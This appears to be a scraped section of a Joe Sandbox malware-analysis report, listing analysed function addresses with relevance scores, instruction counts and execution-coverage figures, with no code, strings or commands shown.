Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054CACD Relevance: 9.0, APIs: 6, Instructions: 34COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054B4D6 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 005C602C Relevance: 7.6, APIs: 5, Instructions: 63COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054C478 Relevance: 7.6, APIs: 5, Instructions: 57COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054B30B Relevance: 7.5, APIs: 5, Instructions: 42COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054B7C7 Relevance: 7.5, APIs: 5, Instructions: 33COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 005C812E Relevance: 7.5, APIs: 5, Instructions: 31COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 005C805A Relevance: 6.0, APIs: 4, Instructions: 43COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054DCCE Relevance: 6.0, APIs: 4, Instructions: 29COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054CE0F Relevance: 6.0, APIs: 4, Instructions: 28COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 5.4% |
Dynamic/Decrypted Code Coverage: | 85.8% |
Signature Coverage: | 0% |
Total number of Nodes: | 106 |
Total number of Limit Nodes: | 8 |
Graph
Function 05979208 Relevance: 8.3, Strings: 6, Instructions: 766COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 05975D50 Relevance: 3.0, Strings: 2, Instructions: 472COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0597E0E8 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010FC52C Relevance: 2.7, Instructions: 2707COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010FDBE0 Relevance: 2.3, Instructions: 2278COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F3E88 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0597A150 Relevance: .6, Instructions: 641COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F4AA0 Relevance: .3, Instructions: 266COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067FD490 Relevance: 1.7, APIs: 1, Instructions: 152COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0597E580 Relevance: 1.6, APIs: 1, Instructions: 127COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067FD4F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067FE46C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0597D1D4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F3E7E Relevance: 1.5, Strings: 1, Instructions: 233COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F6EE8 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F7D98 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F7DA8 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F6BB0 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F8739 Relevance: .6, Instructions: 552COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F8748 Relevance: .6, Instructions: 550COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F4A96 Relevance: .3, Instructions: 259COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010FA1C2 Relevance: .3, Instructions: 251COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010FA6D8 Relevance: .2, Instructions: 213COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010FA510 Relevance: .1, Instructions: 144COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F6CEE Relevance: .1, Instructions: 133COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F1108 Relevance: .1, Instructions: 132COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F6CF8 Relevance: .1, Instructions: 132COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010FA502 Relevance: .1, Instructions: 119COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F1138 Relevance: .1, Instructions: 112COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F26E4 Relevance: .1, Instructions: 95COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F26F0 Relevance: .1, Instructions: 90COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010FA080 Relevance: .1, Instructions: 84COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010FA090 Relevance: .1, Instructions: 78COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F4F90 Relevance: .1, Instructions: 74COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F16A8 Relevance: .1, Instructions: 73COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F1880 Relevance: .1, Instructions: 73COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F9F80 Relevance: .1, Instructions: 73COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0109D030 Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F1382 Relevance: .1, Instructions: 71COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F1890 Relevance: .1, Instructions: 70COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F9F90 Relevance: .1, Instructions: 70COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F16B8 Relevance: .1, Instructions: 69COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F4FA0 Relevance: .1, Instructions: 68COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F17C8 Relevance: .1, Instructions: 66COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F0838 Relevance: .1, Instructions: 62COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F0848 Relevance: .1, Instructions: 62COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F07F9 Relevance: .1, Instructions: 61COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F1494 Relevance: .1, Instructions: 56COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0109D02B Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F14A0 Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010FA6CA Relevance: .1, Instructions: 52COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F8F20 Relevance: .0, Instructions: 39COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F7EC0 Relevance: .0, Instructions: 34COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F8F30 Relevance: .0, Instructions: 33COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 05975670 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 05970308 Relevance: 9.0, Strings: 6, Instructions: 1493COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0597C370 Relevance: 4.3, Strings: 3, Instructions: 574COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 05973CC0 Relevance: 2.9, Strings: 2, Instructions: 409COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010FE4BD Relevance: 2.0, Instructions: 1959COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 05973560 Relevance: 1.8, Strings: 1, Instructions: 598COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010F41D0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 059745C0 Relevance: .8, Instructions: 812COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067FA198 Relevance: .3, Instructions: 264COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067FBC48 Relevance: .2, Instructions: 217COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|